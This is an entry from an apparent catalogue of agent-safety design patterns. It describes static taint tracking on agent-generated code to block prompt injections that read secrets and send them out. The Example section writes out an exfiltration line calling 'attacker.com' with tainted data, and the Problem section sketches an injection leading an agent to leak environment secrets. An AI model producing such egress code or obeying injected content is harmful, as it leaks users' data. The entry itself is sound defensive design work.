VIII · Safety & ControlEmerging

Code-Then-Execute with Dataflow Analysis

also known as Tainted-Value Code Execution, Sandbox-DSL with Provenance

Have the agent emit code in a sandbox DSL whose values are statically tagged trusted/tainted via dataflow analysis before execution, enabling per-value policy enforcement.

Context

An agent solves complex tasks by generating code that the runtime executes — data extraction, multi-step computations, tool chains. Some inputs to the code come from untrusted sources (user input, fetched content, tool outputs from third-party APIs).

Problem

Without provenance tracking, the executor cannot distinguish trusted values (the agent's plan, user goal) from tainted values (fetched content that could be attacker-controlled). The same `exec(code)` runs both. A prompt injection in fetched content can produce code that, e.g., reads secrets from env and embeds them in an outbound URL — and the sandbox cannot reject it because it cannot tell the URL is tainted.

Forces

  • Free-form code generation is the agent's primary capability.
  • Static dataflow analysis on generated code constrains expressivity.
  • Tagging every value as trusted/tainted requires the DSL to track provenance.

Example

A research agent generates code: `summary = summarize(fetch('https://...'))`. The fetched content is TAINTED. The agent then writes `requests.get(f'https://attacker.com?d={summary}')`. Dataflow analysis sees TAINTED → network egress → rejects program before execution. Without the analysis the sandbox would have allowed the egress because outbound HTTPS is permitted.

Diagram

Solution

Therefore:

Define a sandbox DSL (subset of Python/TS or a custom Pyret-style language) where every value carries a provenance tag (TRUSTED, TAINTED, MIXED). The runtime performs static dataflow analysis on each agent-generated program before execution: if a TAINTED value reaches a sink declared sensitive (network egress, env reads, file writes outside scratch dir), reject the program. Pair with sandbox-isolation, action-selector-pattern.

What this pattern forbids. The runtime may not execute agent-generated code without first running dataflow analysis; programs whose taint reaches a sensitive sink are rejected, not sanitized.

And the patterns that stand alongside it, or against it —

  • complementsSandbox Isolation★★Run agent-emitted code or actions in a contained environment with restricted filesystem, network, and process privileges.
  • complementsCode-as-Action AgentHave the agent emit a code snippet as its action each step, executed in a constrained interpreter, instead of emitting JSON tool calls; tool composition becomes function nesting and control flow inside the snippet.
  • complementsCode Execution★★Let the model emit code, run it in a sandbox, and treat the run as the answer instead of trusting the model to compute in its head.
  • complementsAction Selector PatternEliminate the feedback channel from tool outputs back into the agent's reasoning step by having the agent select actions from a fixed catalog rather than free-form generation over tool output.
  • complementsTool Output Poisoning DefenseTreat tool output as untrusted content and apply instruction-stripping plus per-tool trust labels.

Neighbourhood

Click any neighbour to follow the language. Scroll to zoom, drag to pan.